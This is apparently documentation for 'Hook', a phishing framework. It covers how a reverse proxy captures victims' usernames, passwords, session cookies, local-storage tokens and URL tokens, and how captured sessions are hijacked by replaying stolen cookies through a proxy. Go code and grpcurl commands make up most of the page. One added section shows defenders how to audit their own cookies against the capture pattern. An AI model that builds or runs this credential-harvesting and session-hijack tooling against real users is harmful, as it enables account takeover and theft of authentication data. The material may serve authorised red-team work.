Session Capture
Hook captures comprehensive session data during phishing attacks, including credentials, cookies, local storage, URL parameters, and full session hijack capabilities.
Overview
The Attack Plane stores all captured runtime data:
- Sessions - Victim interaction sessions
- Credentials - Captured usernames and passwords
- Cookies - Authentication and session cookies
- Local Storage - Browser local storage data
- URL Parameters - Query string parameters
- Hijacks - Full session hijack data
Sessions
Each victim interaction creates a session:
type Session struct {
    Id           string
    Username     string
    Password     string
    Custom       map[string]string
    Params       map[string]string
    CookieTokens map[string]map[string]*CapturedCookie
    BodyTokens   map[string]string
    HttpTokens   map[string]string
    RemoteAddr   string
    UserAgent    string
    IsDone       bool
    IsAuthUrl    bool
    CreatedAt    time.Time
    UpdatedAt    time.Time
}
Session Operations
# Create session
grpcurl -d '{
  "session": {
    "raid_id": 1,
    "target_id": 1,
    "uuid": "abc123",
    "ip_address": "192.168.1.100",
    "user_agent": "Mozilla/5.0..."
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewSession
# Get sessions for raid
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetSessionsForRaid
# Get sessions for target
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetSessionsForTarget
Credential Capture
Automatic Detection
The reverse proxy automatically detects credentials:
func (s *Session) searchForCredentials(params map[string]string) {
    for key, value := range params {
        // Check against username patterns
        if s.Target.Username.Regex.MatchString(key) {
            s.Username = value
        }
        // Check against password patterns
        if s.Target.Password.Regex.MatchString(key) {
            s.Password = value
        }
    }
}
Credential Storage
# Create credential
grpcurl -d '{
  "credential": {
    "session_id": 1,
    "username": "john.doe@acme.com",
    "password": "captured_password",
    "source": "form_post"
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCredential
# Get credentials by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCredentialsBySessionID
# Get credentials by target
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCredentialsByTargetID
Cookie Capture
Automatic Cookie Capture
Session cookies are captured automatically:
func captureCookies(resp *http.Response, session *Session) {
    // domain is not defined in this excerpt; it is assumed to be the host the response came from.
    commonSessionCookies := regexp.MustCompile(`(?i)(session|sess|sid|token|auth|jwt|access|refresh|id)`)
    for _, cookie := range resp.Cookies() {
        // Build the record once so both checks below can store it
        captured := &CapturedCookie{
            Name:     cookie.Name,
            Value:    cookie.Value,
            Domain:   domain,
            Path:     cookie.Path,
            HttpOnly: cookie.HttpOnly,
            Expires:  cookie.Expires,
        }
        // Capture configured cookies
        if session.Target.Cookies.Regex.MatchString(cookie.Name) {
            session.AddCookieToken(domain, cookie.Name, captured)
        }
        // Also capture common session cookies
        if commonSessionCookies.MatchString(cookie.Name) {
            session.AddCookieToken(domain, cookie.Name, captured)
        }
    }
}
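For defenders, the name pattern above can be run against your own application's Set-Cookie headers to see which cookies a reverse proxy of this kind would collect. The following is an added example, not part of Hook's code; `AuditSetCookies`, `Finding` and the sample headers are constructed for illustration. The HttpOnly and Secure flags are reported only to show that they do not change the result, since the proxy reads Set-Cookie on the wire.

```go
package main

import (
	"fmt"
	"net/http"
	"regexp"
)

// Pattern copied from the captureCookies snippet on this page.
var commonSessionCookies = regexp.MustCompile(`(?i)(session|sess|sid|token|auth|jwt|access|refresh|id)`)

// Finding describes one cookie set by the application under review (hypothetical type).
type Finding struct {
	Name     string
	Matched  string // part of the name that triggered the pattern, "" if none
	HttpOnly bool
	Secure   bool
}

// AuditSetCookies parses raw Set-Cookie header values and records whether each
// cookie name matches the pattern, along with its browser-side flags.
func AuditSetCookies(setCookie []string) []Finding {
	resp := &http.Response{Header: http.Header{"Set-Cookie": setCookie}}
	var out []Finding
	for _, c := range resp.Cookies() {
		out = append(out, Finding{
			Name:     c.Name,
			Matched:  commonSessionCookies.FindString(c.Name),
			HttpOnly: c.HttpOnly,
			Secure:   c.Secure,
		})
	}
	return out
}

// Constructed sample headers, not taken from any real site.
var sampleHeaders = []string{
	"__Host-session=abc; Path=/; Secure; HttpOnly; SameSite=Lax",
	"sidebar_width=240; Path=/",
	"theme=dark; Path=/",
	"csrf_token=xyz; Path=/; Secure",
}

func main() {
	for _, f := range AuditSetCookies(sampleHeaders) {
		fmt.Printf("%-16s matched=%-10q HttpOnly=%-5v Secure=%v\n", f.Name, f.Matched, f.HttpOnly, f.Secure)
	}
}
```

The pattern is an unanchored substring match, so `sidebar_width` matches on `sid` even though it carries no authentication state, while the HttpOnly `__Host-session` cookie matches regardless of its flags.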
Cookie Operations
# Create captured cookie
grpcurl -d '{
  "cookie": {
    "session_id": 1,
    "name": "session_token",
    "value": "abc123xyz",
    "domain": "target.com",
    "path": "/",
    "secure": true,
    "http_only": true
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCapturedCookie
# Get cookies by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedCookiesBySessionID
# Get cookies by target
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedCookiesByTargetID
Local Storage Capture
Capture browser local storage data:
# Create captured local storage
grpcurl -d '{
  "item": {
    "session_id": 1,
    "key": "auth_token",
    "value": "eyJhbGciOiJIUzI1NiIs..."
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCapturedLocalStorage
# Get local storage by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedLocalStorageBySessionID
URL Parameter Capture
Capture query string parameters:
# Create captured URL param
grpcurl -d '{
  "param": {
    "session_id": 1,
    "key": "token",
    "value": "reset_token_value"
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCapturedURLParam
# Get URL params by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedURLParamsBySessionID
Session Hijacking
Hijack Process
After capturing authentication data, sessions can be hijacked:
func (h *Hijacker) HijackSession(s *Session) {
    port := h.findOpenPort()
    h.sessions[s.Id] = port
    // Create proxy with captured session data
    err := NewProxy(port, "0.0.0.0", s.Target.TargetURL, s.Cookies, s.Headers)
}
Hijack Operations
# Create hijack record
grpcurl -d '{
  "hijack": {
    "session_id": 1,
    "target_site": "https://target.com",
    "proxy_port": 10001
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewHijack
# Get hijacks by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetHijacksBySessionID
Click and Open Tracking
Clicks
# Create click
grpcurl -d '{
  "click": {
    "session_id": 1,
    "page": "/login",
    "ip_address": "192.168.1.100"
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewClick
# Get clicks by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetClicksBySessionID
Opens (Email Tracking)
# Create open
grpcurl -d '{
  "open": {
    "session_id": 1,
    "ip_address": "192.168.1.100"
  }
}' helm:61443 hook.atk_svc.AttackPlaneService/NewOpen
# Get opens by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetOpenBySessionID